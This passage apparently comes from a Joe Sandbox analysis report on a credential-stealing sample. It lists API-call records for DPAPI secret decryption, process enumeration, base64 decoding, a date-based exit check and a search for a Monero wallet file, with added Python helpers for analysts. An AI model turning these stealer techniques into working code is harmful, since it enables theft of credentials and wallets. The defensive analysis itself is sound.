                  • Instruction Fuzzy Hash: B1A228F360C2049FE304AE2DEC8567AFBE9EF94720F1A493DE6C4C3344EA7558458696
                  APIs
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N*,00000000,00000000), ref: 002A9AEF
                  • LocalAlloc.KERNEL32(00000040,?,?,?,002A4EEE,00000000,?), ref: 002A9B01
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N*,00000000,00000000), ref: 002A9B2A
                  • LocalFree.KERNEL32(?,?,?,?,002A4EEE,00000000,?), ref: 002A9B3F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptLocalString$AllocFree
                  • String ID: N*
                  • API String ID: 4291131564-1366310849
                  • Opcode ID: 725557d9fe2476891983df011ab6b306747b9629ee33577fa15afcbba9ca4b85
                  • Instruction ID: c69be893b0032c0f497fdaa89ae16dcd522e3bdf8ea2c7168b7ba2aa4fd175dd
                  • Opcode Fuzzy Hash: 725557d9fe2476891983df011ab6b306747b9629ee33577fa15afcbba9ca4b85
                  • Instruction Fuzzy Hash: A611A2B4240208EFEB10CF64DC95FAA77B5FB8A704F208458F9159F390C7B6A951CBA4
                  APIs
                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 002AC871
                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 002AC87C
                  • lstrcat.KERNEL32(?,002C0B46), ref: 002AC943
                  • lstrcat.KERNEL32(?,002C0B47), ref: 002AC957
                  • lstrcat.KERNEL32(?,002C0B4E), ref: 002AC978
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$BinaryCryptStringlstrlen
                  • String ID:
                  • API String ID: 189259977-0
                  • Opcode ID: 12db7cf31575b3b3bcf55e89901ae056a21cba2fd2a03945e543264bcc51005f
                  • Instruction ID: 2c4079097160325e04388cbbb038a22978511fa6e5b9dcdca0efb15968a91985
                  • Opcode Fuzzy Hash: 12db7cf31575b3b3bcf55e89901ae056a21cba2fd2a03945e543264bcc51005f
                  • Instruction Fuzzy Hash: CD418FB491421ADBCB10DFA0DD89BFEB7B8BF48304F1045B8F509A6280DB706A94CF91
                  APIs
                  • GetSystemTime.KERNEL32(?), ref: 002B696C
                  • sscanf.NTDLL ref: 002B6999
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 002B69B2
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 002B69C0
                  • ExitProcess.KERNEL32 ref: 002B69DA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Time$System$File$ExitProcesssscanf
                  • String ID:
                  • API String ID: 2533653975-0
                  • Opcode ID: 17be921d9534aa2f3d44d8e1ef08095305c0918a500564adf394e6adfc77b946
                  • Instruction ID: b7c4595799283a36825be4d491b0a0a1838fd44a24ba483d353ec0dd88960e11
                  • Opcode Fuzzy Hash: 17be921d9534aa2f3d44d8e1ef08095305c0918a500564adf394e6adfc77b946
                  • Instruction Fuzzy Hash: 2B21DF75D14209ABCF04EFE4D9899EEB7B5FF48300F04452EE406E7251EB346619CB69
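GetSystemTime, an sscanf on a string, two SystemTimeToFileTime conversions and an ExitProcess in one function have the shape of a build-expiry check: parse an embedded date, convert it and the current time to FILETIME, compare the two, and exit when the build is past its date. The report shows neither the date format nor which branch calls ExitProcess, so the Python below is an added model written for this page, not the sample's code or Joe Sandbox output. It assumes a `DD.MM.YYYY` string and a "now is later than expiry" test; the FILETIME arithmetic (100 ns ticks since 1601-01-01 UTC, the same epoch SystemTimeToFileTime uses) is the part an analyst needs to turn a date string recovered from a dump into the value the binary actually compares.

```python
import re
from datetime import datetime, timezone

# SystemTimeToFileTime counts 100-nanosecond intervals from this epoch.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

def system_time_to_file_time(dt):
    """Same result as SystemTimeToFileTime for the given wall-clock time.
    Naive datetimes are taken as UTC, matching GetSystemTime (not GetLocalTime)."""
    if dt.tzinfo is None:
        dt = dt.replace(tzinfo=timezone.utc)
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86_400 + delta.seconds) * 10_000_000 + delta.microseconds * 10

def parse_expiry(text):
    """sscanf-like parse of the expiry string. The DD.MM.YYYY layout is an
    assumption made for this illustration; the report only shows that sscanf is
    called. Raises ValueError when fewer than three fields match, which is the
    case a C caller detects by checking sscanf's return value."""
    m = re.fullmatch(r"\s*(\d{1,2})\.(\d{1,2})\.(\d{4})\s*", text)
    if not m:
        raise ValueError(f"expiry string does not match DD.MM.YYYY: {text!r}")
    day, month, year = (int(g) for g in m.groups())
    return datetime(year, month, day, tzinfo=timezone.utc)

def build_expired(expiry_text, now=None):
    """True when the current time is past the embedded expiry. Both SYSTEMTIMEs go
    through the FILETIME conversion and are compared as integers, which is what the
    GetSystemTime -> sscanf -> SystemTimeToFileTime x2 -> ExitProcess chain amounts
    to (assumption: the exit branch is taken when now > expiry)."""
    now = now if now is not None else datetime.now(timezone.utc)
    return system_time_to_file_time(now) > system_time_to_file_time(parse_expiry(expiry_text))

def main():
    # Constructed example: a build stamped to expire on 15 September 2024,
    # probed with three clock values around that date.
    for probe in ("14.09.2024", "15.09.2024", "16.09.2024"):
        verdict = "would ExitProcess" if build_expired("15.09.2024", parse_expiry(probe)) else "continues"
        print(probe, "->", verdict)

if __name__ == "__main__":
    main()
```

The practical use is in the other direction: once the date string is recovered from the unpacked image, the same conversion tells the analyst how long the build was meant to live, and a sandbox whose clock is past that point will see only the ExitProcess path and none of the collection behaviour documented in the other records.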
                  APIs
                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 002A724D
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002A7254
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 002A7281
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 002A72A4
                  • LocalFree.KERNEL32(?), ref: 002A72AE
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                  • String ID:
                  • API String ID: 2609814428-0
                  • Opcode ID: 69cbf11a91af0f4e03e8d8f272b6179e04e6436d928e663f22e20336155cb7ad
                  • Instruction ID: 3445a68372080d54119307768aeead7354040b3bd5c0a53dbc3ef0f24a30f357
                  • Opcode Fuzzy Hash: 69cbf11a91af0f4e03e8d8f272b6179e04e6436d928e663f22e20336155cb7ad
                  • Instruction Fuzzy Hash: E10100B5A40208BBDB10DFD4CD89F9D7778FB44700F104554FB05AA2C1DAB0BA108B69
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 002B961E
                  • Process32First.KERNEL32(002C0ACA,00000128), ref: 002B9632
                  • Process32Next.KERNEL32(002C0ACA,00000128), ref: 002B9647
                  • StrCmpCA.SHLWAPI(?,00000000), ref: 002B965C
                  • CloseHandle.KERNEL32(002C0ACA), ref: 002B967A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                  • String ID:
                  • API String ID: 420147892-0
                  • Opcode ID: addf61e814f5cd636c711db48e4e084b6bd385f02e421ac2154667fa58d1e0c2
                  • Instruction ID: b5f21fb8775353ba27e9ebbaf67ceba99335dfb1a6f4000ca1221a3338ecff2f
                  • Opcode Fuzzy Hash: addf61e814f5cd636c711db48e4e084b6bd385f02e421ac2154667fa58d1e0c2
                  • Instruction Fuzzy Hash: 05010CB5A10208ABDB14DFA5CD88BEDBBF8FB48340F104198E90996240D775ABA0CF51
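Across the function records in this section, the triage-relevant signal sits in a few call patterns: the Toolhelp32 snapshot with Process32First/Process32Next and a StrCmpCA on each entry (the record just above), CryptUnprotectData (DPAPI) followed by WideCharToMultiByte, CryptStringToBinaryA with dwFlags 00000001 (CRYPT_STRING_BASE64) in a size-query-then-decode pair around LocalAlloc, the FindFirstFileA/FindNextFileA walk, the GetSystemTime/SystemTimeToFileTime/ExitProcess chain, and the GetKeyboardLayoutList/GetLocaleInfoA pair. The Python below is an added helper for reading such records, written for this page and not part of Joe Sandbox or of the sample: it parses the `• Api.MODULE(args), ref: ADDR` bullet lines (including the `Part of subcall function` prefix and the argument-less form such as `sscanf.NTDLL ref:`), pulls out the string literals the disassembler resolved, and tags a record with the labels above when the required APIs are all present. The rule labels are this editor's reading of the call chains; the two sample inputs are copied from the records on this page.

```python
import re

# One line of the report's "APIs" list. Forms it must accept (taken from this page):
#   • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 002B961E
#   • sscanf.NTDLL ref: 002B6999                          (no argument list)
#   • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,...), ref: 002BA9C5
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")
HEX32 = re.compile(r"[0-9A-F]{8}")  # how the report prints resolved 32-bit values

def parse_api_lines(text):
    """Turn the bullet list into dicts; lines that are not API records are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            args = [a for a in (m["args"] or "").split(",") if a]
            calls.append({"api": m["api"], "module": m["module"], "args": args,
                          "ref": m["ref"], "subcall": m["sub"]})
    return calls

def hex_arg(call, index):
    """Numeric value of argument `index`, or None for '?', a string literal or a missing slot."""
    try:
        return int(call["args"][index], 16)
    except (IndexError, ValueError):
        return None

def is_base64_decode(call):
    # CryptStringToBinaryA(pszString, cchString, dwFlags, ...): dwFlags 1 is CRYPT_STRING_BASE64.
    # Records that show only two arguments leave the flag unknown and do not match.
    return call["api"] == "CryptStringToBinaryA" and hex_arg(call, 2) == 1

# (label, APIs the function itself must call, optional predicate that some call must satisfy)
RULES = [
    ("process enumeration: Toolhelp32 walk with name compare",
     {"CreateToolhelp32Snapshot", "Process32First", "Process32Next", "StrCmpCA"}, None),
    ("DPAPI decryption of stored secrets", {"CryptUnprotectData"}, None),
    ("base64 decode via CryptStringToBinaryA(CRYPT_STRING_BASE64)",
     {"CryptStringToBinaryA"}, is_base64_decode),
    ("recursive file enumeration: FindFirstFileA/FindNextFileA loop",
     {"FindFirstFileA", "FindNextFileA"}, None),
    ("date compare then ExitProcess (expiry-check shape)",
     {"GetSystemTime", "SystemTimeToFileTime", "ExitProcess"}, None),
    ("keyboard-layout / locale check", {"GetKeyboardLayoutList", "GetLocaleInfoA"}, None),
]

def classify(calls):
    """Labels whose required API set is fully present among the function's own calls.
    'Part of subcall' lines describe callees, so they do not count toward the set."""
    direct = {c["api"] for c in calls if c["subcall"] is None}
    return [label for label, required, pred in RULES
            if required <= direct and (pred is None or any(pred(c) for c in calls))]

def literal_strings(calls):
    """Arguments the disassembler resolved to strings: not '?' and not a 32-bit hex value."""
    seen = []
    for c in calls:
        for a in c["args"]:
            if a != "?" and not HEX32.fullmatch(a) and a not in seen:
                seen.append(a)
    return seen

def triage(text):
    calls = parse_api_lines(text)
    return {"calls": len(calls), "findings": classify(calls), "strings": literal_strings(calls)}

# Constructed sample input: two records copied from this page.
SAMPLE_FILE_WALK = r"""
  • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
  • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,002C0D73), ref: 002AE4A2
  • StrCmpCA.SHLWAPI(?,002C14F8), ref: 002AE4F2
  • StrCmpCA.SHLWAPI(?,002C14FC), ref: 002AE508
  • FindNextFileA.KERNEL32(000000FF,?), ref: 002AEBDF
"""
SAMPLE_PROCESS_ENUM = """
  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 002B961E
  • Process32First.KERNEL32(002C0ACA,00000128), ref: 002B9632
  • Process32Next.KERNEL32(002C0ACA,00000128), ref: 002B9647
  • StrCmpCA.SHLWAPI(?,00000000), ref: 002B965C
  • CloseHandle.KERNEL32(002C0ACA), ref: 002B967A
"""

if __name__ == "__main__":
    for name, sample in (("file walk", SAMPLE_FILE_WALK), ("process enum", SAMPLE_PROCESS_ENUM)):
        print(name, triage(sample))
```

Paste any "APIs" record from the report into `triage` and it returns the resolved string arguments (here `\Monero\wallet.keys` and `\*.*` for the file walk) together with the matching labels; a record whose only evidence is a `?` argument, such as the two-argument CryptStringToBinaryA at 002AC87C, is deliberately left untagged rather than guessed.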
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: +~$>I<$RMn_$4k
                  • API String ID: 0-4273282719
                  • Opcode ID: 4e69542bcee9302a49e030a49b230a1ff7ee24de0f80c97f20f4fabef495efaa
                  • Instruction ID: c9ac09f21fc54bc6282e7e56d37139b1ade710b19cbc4c3f2f73d3dfa935a531
                  • Opcode Fuzzy Hash: 4e69542bcee9302a49e030a49b230a1ff7ee24de0f80c97f20f4fabef495efaa
                  • Instruction Fuzzy Hash: 37B205F3A0C3049FE3046E29EC8567AFBE5EF94720F168A3DE6C583744EA3558058697
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: -19o$.Sw$:Yw$A(}R
                  • API String ID: 0-139244064
                  • Opcode ID: 53e85c5d39cf2a42a60dcccbf949ff5546e45466ae79a7931828300e5839f522
                  • Instruction ID: 4aae8bf75a08ad5babaee7eac53760fa2692e5c479df3adc77fc1dcf24f8be3d
                  • Opcode Fuzzy Hash: 53e85c5d39cf2a42a60dcccbf949ff5546e45466ae79a7931828300e5839f522
                  • Instruction Fuzzy Hash: D3B2F6F36082049FE304AE2DEC8567AB7E9EF94720F16893DEAC4C3744E63598458797
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 7u$Gwg$`o6$u?
                  • API String ID: 0-466346664
                  • Opcode ID: f3eeb88ba88e74b8cdc777ebbc3415caaed6f5efda1582736f0a4e22ffa6d58c
                  • Instruction ID: 18dccb265cc463543bb42cd895f7d3a15fe969b82203dac4886b01a0b2c6361b
                  • Opcode Fuzzy Hash: f3eeb88ba88e74b8cdc777ebbc3415caaed6f5efda1582736f0a4e22ffa6d58c
                  • Instruction Fuzzy Hash: ABB207F3A08214AFE304AE2DEC4577ABBE5EF94320F1A453DEAC4C7744EA3558058796
                  APIs
                  • CryptBinaryToStringA.CRYPT32(00000000,002A5184,40000001,00000000,00000000,?,002A5184), ref: 002B8EC0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptString
                  • String ID:
                  • API String ID: 80407269-0
                  • Opcode ID: 50f04957cf13fadb8b092e91b5ca80abae7faa5a5ea73a837a4ab918e7a33672
                  • Instruction ID: c9964ba725d94703a9fba4e442e9f8223e05418227e5c90968e78e72defbccc4
                  • Opcode Fuzzy Hash: 50f04957cf13fadb8b092e91b5ca80abae7faa5a5ea73a837a4ab918e7a33672
                  • Instruction Fuzzy Hash: CC111570220209BFDB00DF64E884FBB37ADAF89380F109458F9598B251DB75EC61DBA5
                  APIs
